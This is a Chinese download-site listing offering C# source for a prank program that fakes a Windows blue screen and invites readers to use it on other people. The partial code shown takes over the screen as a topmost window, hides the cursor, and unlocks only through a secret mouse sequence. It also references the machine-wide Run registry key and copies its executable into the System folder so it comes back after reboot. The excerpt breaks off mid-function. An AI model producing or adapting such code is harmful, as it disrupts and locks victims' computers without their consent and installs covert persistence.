资源简介
这是一个模仿蓝屏的代码,运行后电脑蓝屏,就算重启也会出现,有需要的看看,可以拿来恶搞别人啊,相关代码都在里面,可以自己修改。
代码片段和文件信息
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Text;
using System.Windows.Forms;
using System.Runtime.InteropServices;
using System.Diagnostics;
using System.IO;
using Microsoft.Win32;
using System.Collections;
namespace Fools
{
///
/// 本程序有速特网制作:http://www.sooot.cn
/// 由于时间仓促,未对代码进行优化,大家将就看吧。
/// 欢迎到本站论坛一起学习讨论:http://bbs.sooot.cn
/// 调试前请注意:本程序模仿死机和蓝屏。可在3秒内点击鼠标以解锁。
/// 鼠标码:11211233312 (“1”为鼠标左键,“2”为鼠标右键,“3”为鼠标中键)
///
public partial class frmBlue : Form
{
#region field
StringBuilder strBuilder = new StringBuilder();
Random random = new Random();
private static int randomInt = 0;
private bool firstFlg = true;
private DateTime time;
private Queue queue = new Queue();
string strs = “11211233312“;
Hotkey hotkey = new Hotkey();
private RegistryKey STARTKEY = Registry.LocalMachine;
private const string REGKEY = @“SoftWare\MicroSoft\Windows\CurrentVersion\Run“;
[DllImportAttribute(“gdi32.dll“)]
private static extern IntPtr CreateDC(
string lpszDriver // 驱动名称
string lpszDevice // 设备名称
string lpszOutput // 无用,可以设定位“NULL“
IntPtr lpInitData // 任意的打印机数据
);
[DllImportAttribute(“gdi32.dll“)]
private static extern bool BitBlt(
IntPtr hdcDest //目标设备的句柄
int nXDest // 目标对象的左上角的X坐标
int nYDest // 目标对象的左上角的X坐标
int nWidth // 目标对象的矩形的宽度
int nHeight // 目标对象的矩形的长度
IntPtr hdcSrc // 源设备的句柄
int nXSrc // 源对象的左上角的X坐标
int nYSrc // 源对象的左上角的X坐标
System.Int32 dwRop // 光栅的操作值
);
#endregion
public frmBlue()
{
InitializeComponent();
}
private void frmBlue_Load(object sender EventArgs e)
{
try
{
randomInt = random.Next();
initQueue();
if (randomInt % 2 == 1)
{
BuildImage();
}
else
{
SetErrorMessage();
this.BackColor = Color.DarkBlue;
}
this.WindowState = FormWindowState.Maximized;
this.ShowInTaskbar = false;
this.TopMost = true;
Cursor.Hide();
this.Focus();
string copyPath = Environment.GetFolderPath(Environment.SpecialFolder.System) +
Application.ExecutablePath.Substring(
Application.ExecutablePath.LastIndexOf(@“\“)
Application.ExecutablePath.Length - Application.ExecutablePath.LastIndexOf(@“\“));
if (!File.Exists(copyPath))
属性 大小 日期 时间 名称
----------- --------- ---------- ----- ----
文件 43008 2009-03-26 23:13 Fools\bin\Debug\Fools.exe
文件 30208 2009-03-26 23:13 Fools\bin\Debug\Fools.pdb
文件 3822 2009-03-26 23:11 Fools\Fools.csproj
文件 899 2009-03-26 23:10 Fools\Fools.sln
..A..H. 15872 2011-06-11 23:24 Fools\Fools.suo
文件 11106 2009-03-26 23:10 Fools\frmBlue.cs
文件 2677 2009-03-26 23:06 Fools\frmBlue.Designer.cs
文件 6008 2008-12-31 19:12 Fools\frmBlue.resx
文件 2742 2009-03-26 23:06 Fools\HotKey.cs
文件 1065 2009-03-26 23:13 Fools\obj\Debug\Fools.csproj.FileListAbsolute.txt
文件 849 2009-03-26 23:13 Fools\obj\Debug\Fools.csproj.GenerateResource.Cache
文件 43008 2009-03-26 23:13 Fools\obj\Debug\Fools.exe
文件 180 2009-03-26 23:13 Fools\obj\Debug\Fools.frmBlue.resources
文件 30208 2009-03-26 23:13 Fools\obj\Debug\Fools.pdb
文件 180 2009-03-26 23:13 Fools\obj\Debug\Fools.Properties.Resources.resources
文件 4608 2009-03-26 23:11 Fools\obj\Debug\TempPE\Properties.Resources.Designer.cs.dll
文件 844 2009-01-05 09:41 Fools\obj\Debug\VS.csproj.GenerateResource.Cache
文件 235 2009-01-05 09:41 Fools\obj\VS.csproj.FileList.txt
文件 857 2009-03-26 23:06 Fools\Program.cs
文件 1494 2009-03-26 23:13 Fools\Properties\AssemblyInfo.cs
文件 2834 2009-03-26 23:11 Fools\Properties\Resources.Designer.cs
文件 5350 2008-12-01 14:39 Fools\Properties\Resources.resx
文件 1103 2009-03-26 23:11 Fools\Properties\Settings.Designer.cs
文件 249 2008-12-01 14:39 Fools\Properties\Settings.settings
文件 25214 2009-01-04 14:00 Fools\setup.ico
目录 0 2008-12-31 16:09 Fools\obj\Debug\Refactor
目录 0 2009-03-26 23:11 Fools\obj\Debug\TempPE
目录 0 2009-03-26 23:13 Fools\bin\Debug
目录 0 2009-03-26 23:13 Fools\obj\Debug
目录 0 2009-03-26 23:11 Fools\bin
............此处省略7个文件信息
- 上一篇:Sbus.rar
- 下一篇:严题集算法设计答案汇总
相关资源
- 阵列信号处理代码大全
- SPEA2源代码
- sap abap 源代码 珍贵资源 供初学者参
- halcon倾斜车牌识别源代码
- 16Qam源代码
- 密码锁的verilog代码
- B样条曲线演示程序的代码
- BroadcastReceiver详解代码
- zw_HMC5883L模块资料电路图源代码.zip
- 数据结构大作业之学生管理系统代码
- FPGA 64位浮点乘法器代码
- 有关各个模型激光器的代码
- 基于小波变换的图像融合代码
- 基于stm32的12864液晶屏的显示代码
- 人脸识别完整代码包括PCA_LDA算法
- opencv图像细化代码
- cpld 串口调试代码 发送接收
- idl代码,用于图像批量裁切
- 蚁群优化算法源代码,源程序
- 交通灯设计VHDL程序代码
- uCOSII在M32上移植的完整代码含proteus模
- linux操作系统实验二
- WebSocket .net聊天室源代码
- 开源的超级玛丽源代码
- cc2530红外接收发射模块代码
- 网吧管理系统带源代码
- 泡泡堂源代码
- 系运动会管理系统(源代码+标准化论
- 纯PB代码实现取MAC和IPPB9)
- Delphi人事管理系统源代码
评论
共有 条评论